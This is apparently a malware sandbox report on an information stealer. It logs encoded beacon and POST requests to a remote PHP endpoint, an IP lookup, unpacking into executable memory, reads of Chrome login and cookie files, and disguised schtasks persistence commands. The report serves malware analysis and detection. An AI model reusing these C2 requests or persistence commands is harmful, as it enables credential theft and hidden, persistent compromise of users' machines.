request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=%00&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=wMlNGZzYGN1MDZ3ADNiNzNyEDMhNjMyIzMhRmZzUTYiZGN2QWM2MDM
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=4iLuMXby9mZgcmbph2Y0VmR&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=4iLuM0Qgcmbph2Y0VmR&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=4iLu0WYydWZsVGVgcmbph2Y0VmR&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=4iLu42bpRXYtJ3bm5WagIXZoR3bgcmbph2Y0VmR&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=2ITNwczMz4SNwoDMwoDMwAiOl1Wa0BCZlNHchxWRgESZu9GR&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=QNwQDN2U2YiZGO2gTNyImZ5ITY4ATNiBjZ3kzYlJTYxATYwIzMzIjZ
request	POST http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ
request	GET http://cc58476.tmweb.ru/vmPacketGeneratoruniversalTrack.php?WVutH0HHMw=MEoiQ9FTt2IrWQH5Rl3tbw0avzYF4z&VHhwoV8C1sEGZNoXdA5zgSCeaNNxak=Y35xjzddjTiBBXqbMGc5F9AZCFCWaHK&QspMdaEi9hVg7RBHuwBq=p4Z3guewHCcI7vSrd8vB35hnecvD5lo&4c9e481a6e2df54faf98863307c8505a=QY2MjYmVTM0YDZ2QmMlR2M1QWM4IGN2EWY0MDZxkjYwUDZkBDOjhjYyQTNwYzM3AjM0gTM0ETN&3074739814e1bc1bd77f06eb291cb8b2=ANxYmZ0ETN3QzNhZ2MzQWZkRjM2UGOzU2N5I2YyEDZmNjZ0YjZ1kDZ&395456b66fc45ba775af61ef30811cd1=QM&be0a06ae2eae18ab30d73f2131cab791=ANwMjZlBDM0MGMhJTOkVzNjlDOkRDZiRWO0MzM0EDMjNWZwQDNzEjN&ccce7aa2c00c6d06441f07b35eb3b7d8=gMmRTOxQTNjRDZ3YWNkZmM2Y2NkZ2MyEWM1MWNzQDN3AjNkFTN4gDO
request	GET https://ipinfo.io/json

Sends data using the HTTP POST Method (1 event)

request

Allocates read-write-execute memory (usually to unpack itself) (50 out of 164 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00410000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ca0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00452000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00587000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00721000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00576000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:37 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00728000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:38 a.m.	process_identifier: 5096 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0072e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f501000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6f502000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02430000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02590000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00521000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 2, 2021, 10:55 a.m.	process_identifier: 8104 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (8 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates a suspicious process (7 events)

cmdline	"schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Windows\System32\CertEnrollUI\SearchProtocolHost.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "thunderbird" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\thunderbird.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\ProgramData\바탕 화면\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ipconfig\winlogon.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\agent\pw.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Python27\libs\Idle.exe'" /rl HIGHEST /f
cmdline	"schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\tmpzdcjvb\lib\api\csrss.exe'" /rl HIGHEST /f

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 5272 thread_handle: 0x00000394 process_identifier: 8300 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Windows\System32\CertEnrollUI\SearchProtocolHost.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000039c	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 6980 thread_handle: 0x00000394 process_identifier: 1892 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Python27\libs\Idle.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003a0	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 9100 thread_handle: 0x000003ac process_identifier: 8636 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\Python27\agent\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b0	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 3980 thread_handle: 0x000003ac process_identifier: 3456 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "thunderbird" /sc ONLOGON /tr "'C:\ProgramData\Start Menu\thunderbird.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003b4	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 7884 thread_handle: 0x000003bc process_identifier: 9112 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ipconfig\winlogon.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003c8	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 6440 thread_handle: 0x000003bc process_identifier: 3932 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "csrss" /sc ONLOGON /tr "'C:\tmpzdcjvb\lib\api\csrss.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003cc	1	1
CreateProcessInternalW April 2, 2021, 10:55 a.m.	thread_identifier: 6956 thread_handle: 0x000003bc process_identifier: 4168 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "schtasks" /create /tn "pw" /sc ONLOGON /tr "'C:\ProgramData\바탕 화면\pw.exe'" /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000003d4	1	1
